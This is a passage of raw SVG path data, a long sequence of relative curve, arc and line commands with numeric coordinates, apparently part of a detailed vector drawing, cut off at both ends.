,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,